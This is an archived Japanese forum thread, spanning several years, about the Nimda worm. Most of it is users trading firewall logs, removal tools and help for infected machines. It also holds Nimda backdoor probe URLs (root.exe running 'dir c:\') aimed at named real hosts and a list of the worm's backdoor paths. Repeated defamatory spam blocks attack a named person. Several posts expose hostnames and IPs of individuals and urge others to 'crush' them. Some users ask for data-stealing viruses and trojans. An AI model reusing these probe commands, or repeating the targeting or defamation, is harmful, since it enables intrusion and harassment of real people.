http://www.postmastergeneral.com/scripts/root.exe?/c+dir+"c:\

Copyleft (C) 水泥棒菊池Ｍツトム県奥様濃ゆ軍西米良し村所１偏屈ババア「菊池記念館」在住村ヤク場役人が水泥棒を止めません。
Ｍツトム県奥様濃ゆ軍西米良し村所「「菊池記念館」」が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来（いちき）日通りドライバーＭツトム県＠三原名誉会長９臭ダイワ運湯５老出身白熊桜島高利貸アイス本社労災無視 　文責　スッポン放送汚れ穴ウンサーチャッキー恩田

規則「勢ﾐ勢ﾐ TCP/UDP」が 209.114.218.117,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 209.114.218.117,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 64.45.60.44,2808
ﾌﾟﾛｾｽ名は N/A

<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>

FullMedical
[email protected]
Reply-To:Mail OP [email protected]
Subject:Full Access Medical: $30 Family Healthcare!
Date:*****
Received: from [209.114.218.164] by hotmail.com with ESMTP
MHotMail*****
Received: (qmail id 5); *****
From [email protected]
Message-ID: [email protected]
X-Sender: optinglobal.com
X-MailID: 9278513
Errors-To: [email protected]
Complain-To: [email protected]
スパムメールの最後に以下のアドレスを開くとあなたのメールアドレスを削除
します、とあるのですがこれは罠でメールアドレスが生きているか確認のためです。
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

第三者中継可能？
airwire.net
flwireless.net (pri=20)

ここでチック
http://195g.virtualave.net/

Ｍツトム県奥様濃ゆ軍西米良し村所「「菊池記念館」」が水泥棒を止めません。

http://vvv.sexplanets.com/scripts/root.exe?/c+dir+"c:\
http://66.40.9.179/scripts/root.exe?/c+dir+"c:\

http://www.optinglobal.com/cgi-bin/[email protected]
Netname: MAX-CUSTNET-989
Netblock: 66.40.9.0 - 66.40.9.255
Coordinator:
Maxim Computer Systems (ZM21-ARIN) [email protected]
510-226-0695

第三者中継可能？
airwire.net
flwireless.net (pri=20)

Copyleft (C) 水泥棒菊池Ｍツトム県奥様濃ゆ軍西米良し村所１偏屈クソババア「菊池記念館」在住村ヤク場役人が水泥棒を止めません。　Ｍツトム県奥様濃ゆ軍西米良し村所「「菊池記念館」」が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来（いちき）日通りドライバーＭツトム県＠三原名誉会長９臭ダイワ運湯５老出身白熊桜島高利貸アイス本社労災無視 　文責　スッポン放送汚れ穴ウンサーチャッキー恩田

今でも元気な host234.knc.ne.jp
いい加減気付けよ。

<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>
<A HREF="mailto:[email protected]">[email protected]</A>

http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

From: [email protected]
[email protected]
Subject:USA Flags - As Seen On TV!Date:*****
Received: from [128.121.214.232] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from localhost)by s0257.pm0.net (8.8.8pmg/8.8.5) id BBB48928for :include:/usr/home/ From [email protected]
Message-Id: [email protected]
X-Info: Message sent by Mindshare Design customer with ID "savebig"
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: savebig X-PMG-Msgid: X-PMG-Recipient: [email protected]

From: [email protected] [email protected]
Subject:Guaranteed best mortgage rates or $500 cash back Date:*****
Received: from [128.121.122.56] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from localhost)by s0281.pm0.net (8.8.8pmg/8.8.5) for :include:/usr/home/ From [email protected]
Message-Id: [email protected]
X-Info: Message sent by Mindshare Design customer with ID "savebig"
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: savebig X-PMG-Msgid: X-PMG-Recipient: [email protected]

第２波が来ました。今度は、fromが [email protected]（←これは被害者）。

SMTPの送信元は yahoobb227098060.bbtec.net (HELO YYY) (43.227.98.60)
>>460 と同一サブネットなので、対処していない模様。

Q．メールを見ただけで感染するウィルスはIE5.0なら大丈夫か？

A．大丈夫でない。
　　Nimdaならアウト。Aliz（whatever.exe）もアウトだと考えた方がいいと思われる。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

Nimda ワーム の影響を受ける恐れのある製品

以下のバージョンをインストールしているシステムにおいて、Internet Explorer の Web ブラウザコントロールを利用する全製品
MicrosoftR Internet Explorer 4.0 / 4.01 / 4.01 SP1 / 4.01 SP2
MicrosoftR Internet Explorer 5.0
MicrosoftR Internet Explorer 5.01 または Internet Explorer 5.01 SP1
MicrosoftR Internet Explorer 5.5 または Internet Explorer 5.5 SP1
MicrosoftR Internet Explorer 6 (最小構成時のみ)

↑のメールとは

Outlook
Outlook Express

のことね。

http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

ヤフーオークションを媒介にしてウイルスがまき散らされているらしい。
ちなみに俺のヤフオク専門のメールアドレスにすでに７通入っていた。

Aliz、思いっきり撒かれましたわ。
ヤフオクの以前の取り引き者とMLから廻ってきたがIE5.5・SP2で命拾い。
バスターかけても削除できず放置しましたとの窓表示でした。
リストアファイルにしつこく残ってて、
削除するのに時間がかかったわ。
誰やこんなもん撒き散らすヴォケは!

これ、たまらんわ。
添付開いてないけれど､
もしもの場合でもSP2入れてるからうちは撒いてねいよなあ・大丈夫よなあと
自分で自分に言い聞かせている…

SP2 雑誌の付録ＣＤで見かけないけど、みんなダウンロードしてるん？
回線状態悪いから時々切れるし・・・
再インストールの度にＤＬも面倒でない？
やっぱ、ISDNってもう時代遅れ？・・・

>>489
ISDNですけどSP2のダウンロードで不自由した事はないよ｡
回線ひどすぎじゃない？

ISDN馬鹿にして怒った？すまん。
ところで雑誌のＣＤに付属ってＭＳは禁止してるのかな？＞ＳＰ２

今もＹＢＢのＩＰと思われるところからNimda系と思われるアタックが。
（ちゃんとゾヌが弾いてるし、ブラウザはネスケだし、今のところは安全・・・なのか？
ネスケのキャッシュにreadme.emlが入ってたけど・・・ちなみにOutlookもOfficeも無し）
昨日は
FWIN,2001/11/24,13:58:39 +9:00 GMT,218.123.236.21:2560,218.123.***.***:80,TCP (flags:S)
今日は
FWIN,2001/11/25,00:05:46 +9:00 GMT,218.123.12.50:2777,218.123.***.***:80,TCP (flags:S)

ちなみに↑の218.123.12.50に行ったら工事中と表示された汚染ＨＰがでました（藁

>>491
ttp://www.ascii.co.jp/pb/ascii/issue/a0108/current/index.html
月刊アスキー２００１年８月号に付属されてましたよ

>>493
実家や妹のパソコンも俺がＳＰ２入れないとならないんで
毎回ＤＬするの面倒で。助かります。

マイクロソフトの方針で、5.5sp2以降はCDに入れないそうです。
高速インターネットが出来るようになったかららしいが…
俺はまだISDNだ！

>>494
私もＩＳＤＮ回線でＤＬしましたよ。
残り時間４時間３０分とか出たときには・・・

御教授ください。
先ほど知らない方（メアドも登録していない人）」から
「そちらからnimda入りのメールがきた」とメールがありました。
そのため>>3トレンドマイクロのオンラインスキャンを試しましたが
nimdaは発見できませんでした。気になるので調べた所、
シマンテックの「W32.Nimda.A@mm」の解説に
＞ワームは、このようにして入手したメールアドレスを、
＞差出人と宛先のアドレスとして使用されます。。つまり、
＞ワームが送信するメールは、感染しているコンピュータ
＞のユーザからではなく、感染したコンピュータ上でNimda
＞が発見したメールアドレスのユーザから送信されたものに見えます。
とありました。私のケースの場合もこの可能性が高いのでしょうか？
私のメアドを登録している私以外の誰かがnimdaに感染しているということなのでしょうか？

スイマセン、とりあえず環境は
win98 IE5.5sp2 です。

ttp://www.dl-smart.com/

MXで落としたエロ動画の正式名称が知りたくて女の名前で
検索してたらここにたどり着きました。開いた瞬間ノー�d先生が
稼働しました。Nimda♪

>>499
んな事で揚げんなボケ！！

>>500
すまん。初体験だったので感動してしまった。
許して。

>501
解ればよろし。
オヤスミ。。
MX気おつけてね。。タチ悪い偽装アプリ有るから。

BADTRANS華やかなりし今日この頃ではありますが、
まだまだNimdaのアタックが我がApacheのログに20〜30/Dayは残り、
はてさて貴奴に寿命は無かったっけとageてみるプログラムが作動中・・・

age

http://210.188.150.143/

収束したのか？

依然とウザイ。
サーバのLogが凄まじくウザイことになってるので(赤虫もまだ多いし)、
キレて該当IP管理者にびしばしメール打ったが無しのつぶて(赤虫もまだ多いし)。

…IPからWhoisしてメアドにテンプレ文送るScriptでも書くか？

/scripts/root.exe
/MSADC/root.exe
/c/winnt/system32/cmd.exe
/d/winnt/system32/cmd.exe

↑こんな名前でダミーのPDFを置いてみたけど、どうなるんだろ。

ニムダ凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/

なんか、特定のIPにpingを送るようなコードが送られて来るんだが、
これもNimda?

年明けからTCP:80のLOGが増えたような…

んだんだ。

正月に入ってからNimda系とみられるアタック多いねぇ。

昨日から米国ATT専用線ユーザの間で爆裂中の模様。
IISって想像以上に普及してて、
ユーザのレベルは想像以上に低いんだねえ・・・

こんな輩が菌を撒く
http://w312.k.fiw-web.net/cgi-bin/local/jcom/wforum.cgi?no=2923&reno=2897&oya=2883&mode=msgview
解んねーなら、WANに繋ぐな。

/scrpits/root.exeに対するアクセスがあったら，一定時間
該当IPからのアクセスを拒絶するようなスクリプト書けない
かなぁ．

動的にaccess.conf書き換えるスクリプトというのも考えたけど，
root権限いるし，その度にkillall -HUP httpdしなきゃいけない
みたいなので，何か妙案ないものか・・・

>>489
一度落としたら捨てずに焼け。
っつうかISDNは本当にやめれ。邪魔だ。

ウィルスの入手場所おせーてまんち

>>519
ログ見て追っかけりゃ良いでしょ。。。

そこをなんとかおちえて　>>520

>>521
だから>>520さんの言うとおり、
HTTP probeのウザイのが来たらログ見て、
http://ほにゃらら とすりゃ良いでしょって！
まだ冬休みですか？

>>522　「HTTP probeのウザイのが来たらログ見て」ってどゆー事？
冬休みじゃありません、春休みですがな。

>>523
ファイヤーウォールソフトを入れたら分かる。
「おめ〜らウイルス欲しくないか？ここにあんぞ〜。」
って教えてくれるWebサーバーがイッパイあるの。

何がしたいのかというと、相手の個人データをメール経由で、
自分のアドレスまで持ってきてくれる、ウィルスが欲しいの。
誰か知らない？

>>525
作者のアドレスまで届けてくれる奴なら、色々有るけど。

自作したら？>>525

下手にやるとアドレスから足がついてタイーホだよ>>525

522の意味も理解できないヤツがウイルスで悪事を働きたい、か。
まったくおめでてー御時世だな。

先日、nimda-a@mm　と　e@mm　に感染しているのを発見。早速感染ファイルを削除したが、その後このファイルがあったフォルダへのアクセスが頻繁にある。
とりあえずnorton先生が拒否してくれているが、どうも落ち着いていられない。
そもそも\inetpub\scriptsってなんだ？やたらとここへアクセスしてくるようなんだけど。
このフォルダごと削除しようとしても送信ファイルが使用中で拒否されるし。
まったくもってわからん。

>>530
あなたが頑なにIISパッチを当てないのは宗教上の理由ですか？

相手のグローバルＩＰが分かっている場合に
そのＩＰに対してトロイとかを忍び込ませたいのですが
トロイの入手方法、トロイの設定方法教えて下さい。
グローバＩＰをスキャンするソフトご存じの方、
入手方法、是非とも教えて下さい。

>>532
ﾀｲｰﾎ　ｻﾖﾅﾗ

馬鹿にするには　まだ恐いね

http://people.site.ne.jp/
より
>更新日: 2002年 1月 18日 (金)



>「生協インターネットショッピング 旧・和書検索発注システム」が Nimda に感染し多くのサーバ管理者に迷惑をかけているようです。

>注意：www2.seikyou.ne.ｊｐ不用意にアクセスすると危険です。

ってあるけど、ソース何だろ？
今時NIMDAに感染ってすごく不思議

生協デスカ。。。おれのISP。。。

年あけてから、Ｎｉｍｄａが急に増えてきているんだけどなぜだろう？
昨年暮れ頃は一時間に１〜２個程度だったのに、さっき２０時から２１時の
一時間でこれだけ来ている　ダブりもあるけど明らかに増加している

61.84.134.137
61.183.100.167
61.74.168.16
61.146.8.140
61.83.254.107
61.171.88.58
61.83.254.107
61.164.73.79
61.241.53.201
61.179.13.237
61.149.17.86
61.85.57.83
61.149.17.86
61.73.87.147

マイクロトレンドのトラッキングセンターでのデータだけど
この一週間で増えてきたみたい

nimda　A-O　がここ24時間で報告件数4万（過去30日で33万　7日で16万）

>>537
それ全部中国と韓国のアドレス。

うちでもチェックしてるけど、やはりほとんどが中国と韓国。
日本からはたまに来るくらい。

発生から約半年が経過してもこの有り様では、
政府レベルで対策しないとダメなんじゃないか？＞中国＆韓国

>>539
つか、もうここまでくると故意に飼ってるんぢゃないかと。。
養殖してるんぢゃないかと。。。。
小一時間・・・・・

何故増えてきたんだろうか？＞中韓
アクセスログ＆エラーログが太って困るよ
ｊｐも数少ないけど、ちょっと増えてたような気がする

中韓＞ＯＳもアプリもピーコ物が殆どなんで起きてる現象だと思う。
当然アクティベーションのあるＸＰは使わない。
忘れた頃に今度はＣＤ−Ｒ経由あたりで再発してnimdaにとってはウマーな環境なんじゃないかな?

http://www.ipa.go.jp/security/topics/newvirus/nimda.html

I-Worm.Zoher
http://tokyo.cool.ne.jp/blackhat

>>470
まさに会社のPCがやられました。
亜種のKLEZ.Eですけど。

"COPYRIGHT END"という題名で、よく行っているバンドの
オフィシャルサイト管理人からメールが来た。添付ファイルなしで118kb。
こちらはそのバンドのファンサイトをやっているので題名が気になったが、
こいつは怪しいと思って別アカウント（Outlookで受信する）へフォワードして
ソースを見たら果たせるかなわけわからん文字の羅列がぎっしり。
これはNimdaの変形なの？

ニムダで一番被害出た企業ってどこだろ？雑誌だと「人件費だけで一億円かかった」
なんてところが匿名で出てるけど・・

ニムダ対策チーム結団式：クラブ□□、数十万円
ニムダ対策激励会：クラブ○○、数十万円
ニムダ対策中間会：クラブ△△、数十万円
ニムダ対策打ち上げパーティ：クラブ××、数十万円
などなど

最近8.4MBもあるreadme.emlを拾ったがだんだん肥大化していくのか?

今朝メールでノートンが検出したので「いまどき？」とびっくり。
hotmailのアカウントだけど、中身はないも同然のhtml。
典型的なsample.exeがついているやつだった。

なんか、突然Nortonが
　
「ウイルス警告
　Norton AntiVirusがコンピュータ上でウイルスを検出しました。
　オブジェクト名：C:\DOCUMENT AND SETTINGS\ALL USERS\D...\desktop.eml
　ウイルス名：W32.Nimda.enc
　適用した処理：ファイルを修復できません。」
　
と言ってきたのでウイルススキャン（当然最新版です）したのですが、何も出てきません。
ファイルの検索でreadme.exeなどを探したのですが出てきません。
どうしたものでしょうか…。

>>551 警告を出した時点で隔離されていればその後スキャンしても
見つかるはずはない。
ノートンアンチウィルスの「レポート」の「検疫項目」「レポートを表示」
の中に該当ファイルがないか確認。あればこれを削除汁。

>>552
確認してみましたが、何もありませんでした。（すべての項目が０でした）
にも関わらず、警告が出続けます。（何の脈絡もなく突然）
うーん、何がどうなってるのやら……。

オブジェクト名の該当場所には何のファイルがあるの？
emlってIE4時代のメールの拡張子ではなかったか。

551はメーラーは何？もしかして古いIE？
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html

>>555 訂正IEじゃなくてOEね。

>>554
PCは大学に置いてあって，今は家なので詳しいことは分かりませんが，
「MYミュージック」とかいうフォルダで，最初からついてるサンプルの音楽や画像が
置いてあるだけでした。怪しげなファイルはたぶん無かったと。
　
>>555
メーラーはAL-Mailを使ってます。あと，Hotmailも。
…そういえば数日前にHotmailでかなり怪しげなメールを不用意にも
開いてしまった事があります。（エラーが起こって中身は見れませんでした）
この現象が起こったのもたしかそのあたりからだったと思うので，それが
原因だったのかもしれません。

>>555のリンク先によると、Nimda削除後のヘッダーにNAVが反応してるみたいだ
ね。Outlook Expressの場合の対処法はそこに載ってるけど、AL-Mailというのは
知らないからhttp://www.almail.com/のサポートで聞いてくれ。

>>558
「ウイルス自体は削除されたけど、その残りカスにNAVが反応している」
という事でいいんですよね？
　
とりあえず今日のところは何故か警告が出ないので、少し様子見しようと思います。
どうにもならなかったらフォーマットという手もありますし。
今使ってるPCは今月買ったばかりなのでソフトをいくつかインストールしなおす
くらいで済むもんで。

http://csx.jp/~your/

>>551
今日、まったく同じ状態になりました
感染ファイルが見つからん（泣）
どこでもらったのかもさっぱり・・・
駆除ソフト入れてみたけど見つからんかった
ほっといても大丈夫なのかな
しばらく様子見・・・

>>95 お恥ずかしながらおっしゃるとおりで。「ウィルスなんて、あれだべ、
メールの添付開かなきゃいいんだべ」つう旧時代の考えで駆除ソフトもいれて
ませんでしたが、昨日ＡＶＧかけてみたらヤシがごっそりいたんです。
慌ててWindowsUpgradeかけました。
ところでNimdaの開発目的（？）って何ですか。ファイルクラッシュでもなさそう
だし。

61.203.67.120

Nimda?

>>561
今日、家へ帰ってきたら、1台のマシンがまさしくその状態・・・・
なんか*.eml　が　いる。
W32 Nimda Fix Tool かけてる最中。
ニュースグループでもらってきたのかなぁ？

.emlの警告って、ほんとにうそばっかりなのですか？
某、比較的有名なソフトメーカーのライブラリにこっそりと
readme.emlなんて置いてあって、クリックするとNAVが反応して
W32.Nimda.encが何回か出た後、何故かWindowsMedia7.1が
起動し、NAVは反応しつづけ、テンポラリに生成されたファイルを
W32.Nimda.A@mmとして駆除し、WindowsMediaは何も再生しない

そんな症状なのですが…。
一応、そのサイトにはメールしましたが、誤報だったのかなぁ…。

Nimdaって差出人偽装しましたっけ？
だれかご回答おながいします。

　

　　

>>566 去年のままのNimdaなら偽装はしない。
ただ、亜種が出回ってない、今後出回らないという保障はないから断言は出来ない。

ウチのﾎｯﾄmailにしらない差出人たちからいくつかメールがきたのです。
添付ﾌｧｲﾙなしで120KBくらい。本文なし。サブジェクトは日本語で
適当な会社名.LTDとかホント適当なんでもあり。

で、いくつかヘッダみてみると必ず経由してくるサーバがひとつある。
どうもそれが犯人くさいのでメールで
「感染してないかー？」と聞いたら「Nimdaっぽい」という返事。症状がそれらしい。
ウィルススキャンしようにも駆除ソフト使おうにも不正処理で強制終了したり
フリーズするからどうしようもないと泣きつかれた。
んなコト知らないヨ！！
ウィンドウズ再インストールしろと言っておいたが、差出人がいつも違うのが気になったのです。
なんだっただんろーな？

ごめ･･。567→566。

あ、klezではない様子･･
連続ウザくてスマソ。。

昨日今日とMXコキつつﾈﾄｻﾌｨｰﾝしてたらＮＩＭＤＡﾓﾗﾁｬｰﾀ…
妙なポップアップやらＨＤコリコリ言いまくるしおかしいとは思ってたんだ（´∀｀）

>>574
一旦氏ね。

今更、、、、Nimdaか？？？
頼むよ。。。。。ns2.linkweb.ne.jpからNimdaがばしばし、、、、

210.156.66.233からバシバシ

キャベツが!!

ﾆﾑﾀﾞのＥに感染しました、、
ノートンが入ってますが、起動すらできません。
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a%40mm.fix.html

この方法でもダメでした。
何かいい方法ご存知の方いませんか？本当に困っています！！

>>578
何ｲｨ！！Ｎｉｍｄａ　だと！！
漏れも苦しめられたぞ！！
・・・・・、で、これで何とかできるかい？
http://www.nai.com/japan/nimdatool.asp

>>579
レスありがとうございます！
今から早速試してみます！！

「操作可能なプログラムまたはバッチ　ファイルとして認識されません」
って表示されちゃったよぉぉ・ﾟ・(ﾉД`)・ﾟ・

>>581
え〜い、こいつら全部ためしてみれ〜い！！

http://www.trendmicro.co.jp/nimda/tool.asp
http://www.cseltd.co.jp/security/sav/virusinfo/analyses/w32nimdaa.htm
http://www.nai.com/japan/nimdatool.asp
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

>>582
ほんとどうもありがとう。。。・ﾟ・(ﾉД`)・ﾟ・
上から2番目だけまだ試してなかったのでやってみます！！
マジでありがたい・・

Nimdaのeに感染しました...
トレンドマイクロからDLしたツールとANTIDOTEを使って一応は削除したんですが、再起動をかけるとまた復活...
しょうがないのでパーテーションを削除し、泣く泣く再インストールしました。
インストールが終了し、直っているか確認したんですが、何故かドライブに共有が掛かっていました。
レジストリなどは再インストの際に初期化されている筈なのに何で...？
ウイルススキャンしても何も出て来ないし...
誰か原因を知っている人がいましたら、ご教授願います。

>>584
Windowsヘルプ→共有, 共有ドライブの保護

>585
レスありがとうございます。今実家に帰る途中で2日ほど確認することが出来ないのですが、戻って来たら試してみます。
ありがとうございました。

絶滅せんな

ns1.netoasis.ne.jp から　Ｎｉｍｄａパケットがきた。。。。

ウイルス警備隊を忘れてはいけない

http://japan.ahnlab.com/download/download_vaccine.asp

http://home.ahnlab.com/download/vaccine.jsp

（＾＾）

test

保守

Nimda市ね

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

>>67
ﾜﾗﾀ

ところで話は変わるけど、携帯ゲーム機"プレイステーションポータブル(PSP)

　このPSPは、新規格UMD(ユニバーサルメディアディスク)というディスクを利用しており、そのサイズは直径6cmととても小さい(CDの半分程度)。 容量は1.8GBとなっている。
画面は4.5インチのTFT液晶で、480px x 272px(16:9)。MPEG4の再生やポリゴンも表示可能。外部端子として、USB2.0とメモリースティックコネクタが用意されているという。

この際、スク・エニもGBAからPSPに乗り換えたらどうでしょう。スク・エニの場合、PSPの方が実力を出しやすいような気がするんですが。
任天堂が携帯ゲーム機で圧倒的なシェアをもってるなら、スク・エニがそれを崩してみるのもおもしろいですし。かつて、PS人気の引き金となったFF７のように。

突然へんなこと言い出してｽﾏｿ……
GBAと比較してみてどうですかね？（シェアのことは抜きで）

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

今更ですがnimdaのEに感染してました。
大学のほったらかしPCで。
とりあえずノートンで駆除しておきました。
どっから感染したんだろう。

ふーん
フロッピー、ネット、メールいろいろ

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

Nimdaか・・・すこし懐かしい

でも時々来るね　ｊｐでもYBBとかco.jpドメインからも

うんこスレ晒しあげしとく

Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定（OEと相性が悪い？）
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
ｗｅｂごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
　（XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる）
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html

ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm

FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。

http://pc3.2ch.net/test/read.cgi/sec/1067918099/321

YahooBB219032184127.bbtec.net
q182192.ap.plala.or.jp

上記２匹潰して！

FLH1Aau243.osk.mesh.ad.jp　（大阪）
203.136.206.243

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)

ホモ野郎のこいつ潰せ！！マジキモイ！！

わざわざユーザーエージェント晒す必要あるのかよ？（ｗ

ああ、誰かー。
Nimdaくれー。
一度ダウソしたことがあるけど、アンチにポワされますた。ああ。。。
検証用として使いたいDeath.
しらんけど、うちのフリーメールはほとんどが、ウイルス送られてくる運命のアドレス
です。これでもいいのでよかったらアドレスも晒してくれません？
3時間以上探していたけど、全く見つかりません。お願いします。このとおりで御座います。
------気にしないで。ここから------
宣伝したことはありません。
まあ、ある意味嬉しいです。
こんなふうになったのはなぜかしら？
---気にしないで。ここまで------
ま、気にしないで。

>>551
うちのパソコンも全く同じ状態になったけどhotmailに来てた添付ファイル付きの
差出人＆日付不明の怪しいメールを削除したら警告がでなくなったよ。

(´･c_･` )

古いスレ上げんなよ。>611は04/07/24だぞ。

↑おまえいもな〜

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】　　【由佳】　　【ﾏﾄﾞﾝﾅ】

j

Nida!

ｔ

長寿にも程があるだろww
2011年まで保守しようぜw

ぬるぽ

>>620
ｶﾞｯ

ぬる(ま゜

緊急浮上！！！

